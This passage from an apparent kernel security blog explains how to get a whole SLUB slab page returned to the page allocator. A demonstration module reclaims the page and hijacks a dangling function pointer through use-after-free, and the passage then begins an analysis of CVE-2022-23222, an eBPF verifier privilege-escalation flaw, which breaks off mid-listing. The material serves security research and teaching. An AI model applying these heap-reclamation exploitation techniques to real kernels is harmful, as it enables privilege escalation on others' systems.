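<p>Going by the outputs above, one would expect <code>same_slab_cache("/sys/kernel/slab/my_struct", "/sys/kernel/slab/pool_workqueue")</code> to return 1 on the host and 0 on the guest.</p>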
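<h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part. 3"></a>Part. 3</h2><p>The first two parts show that when <code>CONFIG_SLAB_MERGE_DEFAULT</code> is disabled, caches are not merged and different <code>kmem_cache</code>s keep their memory completely isolated from each other.</p>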
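<p>In that case, the only way to reclaim the memory of a freed slab object (say, a <code>struct file</code>) is to allocate another object from the same cache, and for objects like <code>struct file</code> user space controls very little of the contents.</p>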
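<p>The workaround is to take over the entire page that holds the target object (e.g. <code>struct file</code>): after the target object has been wrongly freed, free the other objects on the same page as well. Once <a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/#how-to-free-a-page" target="_blank" rel="noopener">a series of conditions</a> is met, the whole page is returned to the buddy allocator and can then be reallocated.</p>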
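<p>The objects that have to be freed alongside the target are exactly those on the same page. The module below uses <code>virt_to_page()</code> for this; as a user-space illustration, assuming 4 KiB pages and order-0 slabs (consistent with the logs above, where 16 consecutive 256-byte objects share one page base), the grouping reduces to masking the object address. The helper names are hypothetical.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 4 KiB pages and order-0 slabs, matching the logs above. */
#define SKETCH_PAGE_SIZE 4096UL

/* Page-aligned base address of the slab page that holds `obj`. */
static uint64_t obj_page_base(uint64_t obj)
{
    return obj & ~(uint64_t)(SKETCH_PAGE_SIZE - 1);
}

/* Two objects are page neighbours iff they share a page base. */
static int same_page(uint64_t a, uint64_t b)
{
    return obj_page_base(a) == obj_page_base(b);
}

/* Objects per order-0 slab, ignoring any debug metadata. */
static unsigned objs_per_page(unsigned obj_size)
{
    assert(obj_size > 0 && obj_size <= SKETCH_PAGE_SIZE);
    return (unsigned)(SKETCH_PAGE_SIZE / obj_size);
}
```

<p>For example, object 31 (<code>ffff88800953df00</code>) and object 32 (<code>ffff888009543000</code>) in the guest log fall on different pages, which is where the bold page boundary in that log sits.</p>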
<hr>
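<p><strong>Condition 1:</strong></p>
<p>The page holding the target object must not be the current CPU slab (<code>s->cpu_slab->page</code>); otherwise the free takes the fast path and never reaches <code>__slab_free()</code>.</p>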
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> __always_inline <span class="keyword">void</span> <span class="title">do_slab_free</span><span class="params">(struct kmem_cache *s,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct page *page, <span class="keyword">void</span> *head, <span class="keyword">void</span> *tail,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">int</span> cnt, <span class="keyword">unsigned</span> <span class="keyword">long</span> addr)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">...</span><br><span class="line"> c = raw_cpu_ptr(s->cpu_slab);</span><br><span class="line">...</span><br><span class="line"> <strong><span class="keyword">if</span> (likely(page == c->page)) {</strong></span><br><span class="line"> ...</span><br><span class="line"> } <span class="keyword">else</span></span><br><span class="line"> __slab_free(s, page, head, tail_obj, cnt, addr);</span><br><span class="line"> ...</span><br></pre></td></tr></table></figure>
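<p><strong>Condition 2:</strong></p>
<p>The per-CPU partial list must be full: <code>put_cpu_partial()</code> reads <code>pobjects</code> from the head page of <code>s->cpu_slab->partial</code> (an approximate count of free objects over the whole list), and once <code>pobjects > s->cpu_partial</code>, the next slab pushed with <code>drain</code> set makes it call <code>unfreeze_partials()</code>.</p>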
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// #define slub_cpu_partial(s) ((s)->cpu_partial)</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">put_cpu_partial</span><span class="params">(struct kmem_cache *s, struct page *page, <span class="keyword">int</span> drain)</span></span></span><br><span class="line">...</span><br><span class="line"> oldpage = this_cpu_read(s->cpu_slab->partial);</span><br><span class="line"> pobjects = oldpage->pobjects;</span><br><span class="line"> <strong><span class="keyword">if</span> (drain && pobjects > slub_cpu_partial(s)) {</strong></span><br><span class="line"> ...</span><br><span class="line"> unfreeze_partials(s, this_cpu_ptr(s->cpu_slab));</span><br></pre></td></tr></table></figure>
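<p><strong>Condition 3:</strong></p>
<p>While <code>unfreeze_partials()</code> walks the per-CPU partial list, the target page must be completely free (<code>inuse == 0</code>) and the node partial list must already hold at least <code>s->min_partial</code> slabs; only then is the page queued on <code>discard_page</code> and returned to the buddy allocator by <code>discard_slab()</code>.</p>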
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">unfreeze_partials</span><span class="params">(struct kmem_cache *s,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct kmem_cache_cpu *c)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">...</span><br><span class="line"> <span class="keyword">while</span> ((page = slub_percpu_partial(c))) {</span><br><span class="line">...</span><br><span class="line"> <strong><span class="keyword">if</span> (unlikely(!<span class="keyword">new</span>.inuse && n->nr_partial >= s->min_partial)) {</strong></span><br><span class="line"> page->next = discard_page;</span><br><span class="line"> <strong>discard_page = page;</strong></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> add_partial(n, page, DEACTIVATE_TO_TAIL);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">...</span><br><span class="line"> <span class="keyword">while</span> (discard_page) {</span><br><span class="line"> page = discard_page;</span><br><span class="line"> discard_page = discard_page->next;</span><br><span class="line"></span><br><span class="line"> stat(s, DEACTIVATE_EMPTY);</span><br><span class="line"> <strong>discard_slab(s, page);</strong></span><br><span class="line"> stat(s, FREE_SLAB);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<hr>
<p><strong>How to trigger it:</strong></p>
<ul>
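<li>Allocate enough objects to fill <code>cpu_partial + 2</code> pages, so that freeing them later can push <code>pobjects</code> above <code>s->cpu_partial</code>;</li>
<li>Allocate objects into a fresh page without filling it, so that <code>c->page</code> points to that page rather than the target page;</li>
<li>Free every object on one page (the target page), so that its <code>inuse</code> drops to 0;</li>
<li>Free one object from each of the remaining pages; once these frees overflow the per-CPU partial list, it is drained and the empty target page is freed.</li>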
</ul>
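<p>The module below implements these steps with index ranges over <code>tmp_ms[]</code>. Its loop comments (<code>16 * 14</code>, <code>15</code>, <code>17</code>) suggest <code>objs_per_slab = 16</code> and <code>cpu_partial = 13</code> on the test kernel; that is an inference, not something the module checks. This sketch recomputes the ranges for arbitrary values; the struct and function names are hypothetical.</p>

```c
#include <assert.h>

/* Index ranges of tmp_ms[] in the module, for n = objs_per_slab, p = cpu_partial. */
struct tmp_ms_layout {
    int fill_end;   /* [0, fill_end): the "16 * 14" loop, p + 1 full slabs */
    int target_end; /* [fill_end, target_end): the "15" loop, n - 1 objects */
    int tail_end;   /* [target_end, tail_end): the "17" loop, n + 1 objects */
};

static struct tmp_ms_layout compute_layout(int n, int p)
{
    struct tmp_ms_layout l;

    assert(n > 0 && p >= 0);
    l.fill_end = n * (p + 1);
    l.target_end = n * (p + 2) - 1;
    l.tail_end = l.target_end + (n + 1); /* == n * (p + 3) */
    return l;
}
```

<p>Since <code>tail_end</code> equals <code>objs_per_slab * (cpu_partial + 3)</code>, it is exactly <code>OBJ_NUM = 16 * 16</code> for the assumed values; on a kernel where that product exceeds <code>OBJ_NUM</code>, <code>tmp_ms</code> would be indexed out of bounds, so sizing it from the runtime values would be safer.</p>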
<p>The code is as follows:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span 
class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Free a whole page by freeing slab objects, then exploit the UAF</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment">➜ ~ uname -r</span></span><br><span class="line"><span class="comment">5.10.90</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"><span class="meta">#<span 
class="meta-keyword">include</span> <span class="meta-string"><linux/kernel.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/mm.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slab.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slub_def.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/sched.h></span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_SIZE 256</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_NUM (16 * 16)</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> {</span></span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">char</span> data[OBJ_SIZE];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> {</span></span><br><span class="line"> <span class="keyword">void</span> (*func)(<span class="keyword">void</span>);</span><br><span class="line"> <span class="keyword">char</span> paddings[OBJ_SIZE - <span class="number">8</span>];</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">} __attribute__((aligned(OBJ_SIZE)));</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span 
class="keyword">struct</span> <span class="title">kmem_cache</span> *<span class="title">my_cachep</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> **<span class="title">tmp_ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">random_ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">target</span>;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">hello_func</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> pr_info(<span class="string">"Hello\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">hack_func</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> pr_info(<span class="string">"Hacked\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> __init <span class="title">km_init</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OO_SHIFT 16</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OO_MASK ((1 << OO_SHIFT) - 1)</span></span><br><span class="line"> 
<span class="keyword">int</span> i, cpu_partial, objs_per_slab;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">target</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">realloc</span>;</span></span><br><span class="line"> <span class="keyword">void</span> *p;</span><br><span class="line"></span><br><span class="line"> tmp_ms = kmalloc(OBJ_NUM * <span class="keyword">sizeof</span>(*tmp_ms), GFP_KERNEL);</span><br><span class="line"> my_cachep = kmem_cache_create(<span class="string">"my_struct"</span>, <span class="keyword">sizeof</span>(struct my_struct), <span class="number">0</span>,</span><br><span class="line"> SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,<span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"%s\n"</span>, my_cachep->name);</span><br><span class="line"> pr_info(<span class="string">"cpu_partial: %u\n"</span>, my_cachep->cpu_partial);</span><br><span class="line"> pr_info(<span class="string">"objs_per_slab: %u\n"</span>, my_cachep->oo.x & OO_MASK);</span><br><span class="line"> pr_info(<span class="string">"\n"</span>);</span><br><span class="line"></span><br><span class="line"> cpu_partial = my_cachep->cpu_partial;</span><br><span class="line"> objs_per_slab = my_cachep->oo.x & OO_MASK;</span><br><span class="line"></span><br><span class="line"> random_ms = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 16 * 14: objs_per_slab * (cpu_partial + 1) objects, filling cpu_partial + 1 slabs</span></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < (objs_per_slab * (cpu_partial + <span class="number">1</span>)); i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span 
class="line"></span><br><span class="line"> <span class="comment">// 15</span></span><br><span class="line"> <span class="keyword">for</span>(i = (objs_per_slab * (cpu_partial + <span class="number">1</span>));</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>; i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// free normal object</span></span><br><span class="line"> ms = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> target = virt_to_page(ms);</span><br><span class="line"> pr_info(<span class="string">"target page: %px\n"</span>, target);</span><br><span class="line"> ms->func = (<span class="keyword">void</span> *)hello_func;</span><br><span class="line"> ms->func();</span><br><span class="line"> kmem_cache_free(my_cachep, ms);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 17</span></span><br><span class="line"> <span class="keyword">for</span>(i = objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>;</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span> + (objs_per_slab + <span class="number">1</span>); i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// free page</span></span><br><span class="line"> <span class="keyword">for</span>(i = (objs_per_slab * (cpu_partial + <span class="number">1</span>));</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>; i++){</span><br><span class="line"></span><br><span class="line"> 
kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>;</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span> + (objs_per_slab + <span class="number">1</span>); i++){</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < (objs_per_slab * (cpu_partial + <span class="number">1</span>)); i++){</span><br><span class="line"> <span class="keyword">if</span>(i % objs_per_slab == <span class="number">0</span>){</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// in other evil task</span></span><br><span class="line"> <span class="built_in">realloc</span> = alloc_page(GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">realloc</span> == target){</span><br><span class="line"> pr_info(<span class="string">"[+] Realloc success!!!\n"</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> p = page_address(<span class="built_in">realloc</span>);</span><br><span class="line"> <span 
class="keyword">for</span>(i = <span class="number">0</span>; i< PAGE_SIZE/<span class="number">8</span>; i++){</span><br><span class="line"> ((<span class="keyword">void</span> **)p)[i] = (<span class="keyword">void</span> *)hack_func;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// UAF</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="number">0</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> ms->func();</span><br><span class="line"></span><br><span class="line"> free_page((<span class="keyword">unsigned</span> <span class="keyword">long</span>)p);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> __exit <span class="title">km_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < OBJ_NUM; i++){</span><br><span class="line"> <span class="keyword">if</span>(tmp_ms[i])</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> }</span><br><span class="line"> kmem_cache_free(my_cachep, random_ms);</span><br><span class="line"> kmem_cache_destroy(my_cachep);</span><br><span class="line"> kfree(tmp_ms);</span><br><span class="line"> pr_info(<span class="string">"Bye\n"</span>);</span><br><span class="line">}</span><br><span 
class="line"></span><br><span class="line"></span><br><span class="line">module_init(km_init);</span><br><span class="line">module_exit(km_exit);</span><br><span class="line"></span><br><span class="line">MODULE_LICENSE(<span class="string">"GPL"</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">"X++D"</span>);</span><br><span class="line">MODULE_DESCRIPTION(<span class="string">"Kernel xxx Module."</span>);</span><br><span class="line">MODULE_VERSION(<span class="string">"0.1"</span>);</span><br></pre></td></tr></table></figure>
</div>
</div>
</article>
<article id="post-2022/07/04/CVE-2022-23222" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2022/07/04/CVE-2022-23222/" class="article-date">
<time datetime="2022-07-04T14:00:00.000Z" itemprop="datePublished">2022-07-04</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2022/07/04/CVE-2022-23222/">CVE-2022-23222: Exploitation Analysis of an eBPF Verifier Privilege-Escalation Vulnerability</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<h1 id="CVE-2022-23222-漏洞分析"><a href="#CVE-2022-23222-漏洞分析" class="headerlink" title="CVE-2022-23222 漏洞分析"></a>CVE-2022-23222 Vulnerability Analysis</h1><p>author: moxingyuan from iceswordlab</p>
<h2 id="一、漏洞背景"><a href="#一、漏洞背景" class="headerlink" title="一、漏洞背景"></a>1. Background</h2><p>CVE-2022-23222 is a Linux kernel vulnerability caused by the eBPF verifier failing to forbid pointer addition and subtraction on certain *_OR_NULL pointer types. It can be exploited for privilege escalation.</p>
<p>Affected kernel versions range from 5.8 to 5.16.</p>
<p>The vulnerability was fixed in kernel versions 5.10.92, 5.15.15 and 5.16.1. In 5.10.92 the fix is commit <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=35ab8c9085b0af847df7fac9571ccd26d9f0f513" target="_blank" rel="noopener">35ab8c9085b0af847df7fac9571ccd26d9f0f513</a> in the Linux kernel stable tree.</p>
<h2 id="二、漏洞成因"><a href="#二、漏洞成因" class="headerlink" title="二、漏洞成因"></a>2. Root Cause</h2><p>The bug is in the adjust_ptr_min_max_vals function in kernel/bpf/verifier.c:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">adjust_ptr_min_max_vals</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *ptr_reg,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *off_reg)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span 
class="keyword">switch</span> (ptr_reg->type) {</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_MAP_VALUE_OR_NULL:</span><br><span class="line"> verbose(env, <span class="string">"R%d pointer arithmetic on %s prohibited, null-check it first\n"</span>,</span><br><span class="line"> dst, reg_type_str[ptr_reg->type]);</span><br><span class="line"> <span class="keyword">return</span> -EACCES;</span><br><span class="line"> <span class="keyword">case</span> CONST_PTR_TO_MAP:</span><br><span class="line"> <span class="comment">/* smin_val represents the known value */</span></span><br><span class="line"> <span class="keyword">if</span> (known && smin_val == <span class="number">0</span> && opcode == BPF_ADD)</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> fallthrough;</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_PACKET_END:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCKET:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCKET_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCK_COMMON:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCK_COMMON_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_TCP_SOCK:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_TCP_SOCK_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_XDP_SOCK:</span><br><span class="line"> verbose(env, <span class="string">"R%d pointer arithmetic on %s prohibited\n"</span>,</span><br><span class="line"> dst, reg_type_str[ptr_reg->type]);</span><br><span class="line"> <span class="keyword">return</span> -EACCES;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span 
class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
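<p>The switch that forbids pointer arithmetic on specific pointer types does not list every *_OR_NULL type, so arithmetic is still allowed on some pointers that may be NULL, even though, as the error message for PTR_TO_MAP_VALUE_OR_NULL says, such pointers are supposed to be null-checked first.</p>
<p>All *_OR_NULL pointer types can be found in enum bpf_reg_type:</p>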
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_reg_type {</span><br><span class="line"> NOT_INIT = <span class="number">0</span>, <span class="comment">/* nothing was written into register */</span></span><br><span class="line"> SCALAR_VALUE, <span class="comment">/* reg doesn't contain a valid pointer */</span></span><br><span class="line"> PTR_TO_CTX, <span class="comment">/* reg points to bpf_context */</span></span><br><span class="line"> CONST_PTR_TO_MAP, <span class="comment">/* reg 
